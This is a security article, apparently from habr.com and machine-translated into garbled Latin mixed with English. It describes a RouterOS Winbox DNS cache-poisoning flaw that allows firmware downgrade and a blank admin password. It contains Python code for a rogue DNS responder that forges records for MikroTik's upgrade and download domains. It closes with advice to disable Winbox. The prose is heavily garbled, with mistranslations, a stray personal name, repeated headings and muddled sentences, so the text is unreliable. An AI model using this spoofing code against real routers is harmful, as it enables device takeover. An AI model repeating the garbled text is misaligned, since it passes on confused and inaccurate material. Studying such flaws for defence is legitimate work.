Backport vulnerability in RouterOS centum milia machinis periculo ponit

Backport vulnerability in RouterOS centum milia machinis periculo ponit

Facultas machinarum gradationis remotae secundum RouterOS (Mikrotik) centena milia machinarum retis in periculo ponit. Consociata vulnerabilitas veneficii DNS cella protocolli Winbox et sinit te outdated onerare (cum reset password defaltam) vel mutata firmware in fabrica.

Backport vulnerability in RouterOS centum milia machinis periculo ponit

Vulnerability details

RouterOS terminatio solutionem mandati pro DNS lookup sustinet.

Backport vulnerability in RouterOS centum milia machinis periculo ponit

Haec petitio tractatur a resolvente binario nomine. Resolver unus e multis binariis quae cum protocollo Winbox RouterOS coniungunt. In alta planitie, "nuntiae" ad portum Winbox missae possunt variis binariis in RouterOS fundi secundum rationem ordinatae numerorum numerorum.

Defalta, RouterOS plumam debilem DNS habet.

Backport vulnerability in RouterOS centum milia machinis periculo ponit

Tamen, etiam cum munus ministri debilitatum est, iter itineris conservat suum cella DNS.

Backport vulnerability in RouterOS centum milia machinis periculo ponit

Cum petierimus utendo winbox_dns_request exempli gratia.com, iter exitum capiet.

Backport vulnerability in RouterOS centum milia machinis periculo ponit

Cum denotare possumus DNS server, per quod petitio debet, intrantes orationes falsas leve est. Exempli gratia, DNS exsequendum servo configurare potes Philippus Klausut semper respondeat cum electronica inscriptione IP 192.168.88.250.

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

Nunc si exempli gratia quaeras.com Winbox utens, videre potes venenum DNS navigatri.

Backport vulnerability in RouterOS centum milia machinis periculo ponit

Utique veneficii example.com non admodum utile est cum iter actu non utatur. Sed iter itineris accedere debet upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com ac download.mikrotik.com. Et per alium errorem potest omnes simul veneno.

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("download.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

Iter unum petit veniam, quinque remittit. Iter non omnia haec responsa recte colligit.

Backport vulnerability in RouterOS centum milia machinis periculo ponit

Patet, hoc etiam impetus utilis est si iter agens pro servo DNS, quia clientes itineris oppugnari permittit.

Hic impetus etiam permittit ut graviore passibilitate uti: downgradum vel reducere versionem RouterOS. Percussor logicam servo renovationis, incluso changelogo, recreat, et copias RouterOS ad versionem hodiernam (vulnerabilem) perspiciendam. Periculum hic positum est in eo quod cum versione "renovata est", administrator tesserae valorem default default repositum est - oppugnator potes in systemate tessera inani!


Oppugnatio omnino laborat, non obstante quod author plura instrumenta vectoria, in iis quae ad embedding posticum in firmwaresed haec ars redundans iam et usus eius ad illegitimos usus illicitus est.

praesidium

Simpliciter inactivare Winbox permittit te ut te ab his oppugnationibus defendas. Quamvis commoditas administrationis per Winbox, melius est protocollo SSH uti.

Source: www.habr.com

Add a comment